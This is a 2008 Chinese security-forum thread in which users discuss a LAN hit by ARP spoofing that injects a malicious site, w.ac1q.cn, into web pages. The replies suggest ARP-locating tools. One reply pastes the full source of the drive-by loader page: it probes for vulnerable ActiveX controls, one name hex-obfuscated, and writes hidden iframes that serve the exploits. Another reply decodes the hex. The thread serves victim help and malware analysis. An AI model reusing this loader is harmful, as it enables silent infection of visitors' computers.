卡饭论坛 » 病毒救援区 » 现在我们的局域网一直都有攻击

mofatuzi 发表于 2008-9-6 13:51

现在我们的局域网一直都有攻击

[font=宋体][size=15px][list]可以检测到 Exploit.Win32.PowerPlay.a        Maxthon Browser [url=http://w.ac1q.cn/next2.htm]http://w.ac1q.cn/next2.htm[/url] 
这个木马 
几乎局域网内所有的机器都受到此木马的攻击，N台机子已经陷落。 

用google浏览器上什么网站都会提示这个警告： 

警告： 访问此网站可能损害您的计算机！ 
位於 [url]www.163.com[/url] 的网站包含来自 w.ac1q.cn 网站的元素，且其中似乎包含恶意程式，可能损害您的电脑或在未经您同意之下擅自执行。单凭造访包含恶意程式的网站就足以影响您的电脑。 
有关这些元素的问题的详情，请访问 w.ac1q.cn 的 Google 安全浏览诊断页面。 
了解保护自己、免遭网上有害软件侵害的详情。 
我已了解访问此网站可能会损害我的计算机。 

据我分析就是这个木马，但是没法解决，请教各位[/list][/size][/font]

zq127 发表于 2008-9-6 14:36

应该是ARP欺骗造成的.安全专业的反ARP欺骗工具试试看

ahzsmzkf 发表于 2008-9-6 15:24

[font=宋体][size=15px][color=#06699][u]avast竟然没有反应[/u][/color]


[attach]351928[/attach]



[font=Simsun][size=16px][attach]351929[/attach][/size][/font]




[/size][/font]

ahzsmzkf 发表于 2008-9-6 15:28

[attach]351936[/attach]

sky123456 发表于 2008-9-6 15:36

貌似ARP欺骗
找ARP工具找下攻击源头

icesoulo 发表于 2008-9-6 21:12

点了一下
红伞叫了2声。。。那个网页就打不开了~~~
[:14:]

xixihaha 发表于 2008-9-7 14:40

大家别试验了，看看怎么处理吧？

ts2884664 发表于 2008-9-7 15:19

首先下载一个ARP定位软件，查看一下ARP的病毒源头，然后帮那电脑彻底查杀咯，不然的话，你的ARP攻击就只可以不断防御，一直提示收攻击的了

xixihaha 发表于 2008-9-7 15:28

用什么ARP定位软件好？

china2008 发表于 2008-9-7 22:34

呵呵 和我的问题一样。
看来真的是局域网的ARP攻击了。怎么办？

sharkvv 发表于 2008-9-8 14:16

面对ARP攻击，最好的方法就是，找到源头去治理！

lilinll035 发表于 2008-9-8 22:58

用金山ARP防火墙

lxilikepal 发表于 2008-9-8 23:33

Code of next2.htm[code]<script>
window.status="完成";
window.onerror=function(){return true;}
if(document.cookie.indexOf("xmanman=")==-1)
{

var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="xmanman=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=20 height=0 src=1.gif></iframe>");
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};                     
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=newlz.gif></iframe>");}}
try{var m;
var hw=new ActiveXObject("Downloader.DLoader.1");}
catch(m){};                     
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=s.gif></iframe>");}}
try{var n;
var hl=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("<iframe width=100 height=0 src=office.gif></iframe>");}}
try{var ffffffff;
var ourgame=new ActiveXObject("\x48\x61\x6e\x47\x61\x6d\x65\x50\x6c\x75\x67\x69"+"\x6e\x43\x6e\x31\x38\x2e\x48\x61\x6e\x47\x61\x6d\x65\x50\x6c\x75\x67\x69\x6e\x43\x6e\x31\x38\x2e\x31");}
catch(ffffffff){};
finally{if(ffffffff!="[object Error]")
{document.write("<iframe width=0 height=0 src=2.gif></iframe>");}}
function caocaoks()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="6.0.14.552")
document.write("<iframe width=100 height=1 src=3.gif></iframe>");
else
document.write("<iframe width=100 height=1 src=4.gif></iframe>");
}

caocaoks();

document.write("<iframe src=uu.htm width=51 height=0><\/iframe>");}
</script>


[/code]

aarwwefdds 发表于 2008-9-9 01:39

\x48\x61\x6e\x47\x61\x6d\x65\x50\x6c\x75\x67\x69\x6e\x43\x6e\x31\x38\x2e\x48\x61\x6e\x47\x61\x6d\x65\x50\x6c\x75\x67\x69\x6e\x43\x6e\x31\x38\x2e\x31=HanGamePluginCn18.HanGamePluginCn18.1
这是偶第一次把这些该死的加密解了一部分

只是看不懂

查看完整版本: 现在我们的局域网一直都有攻击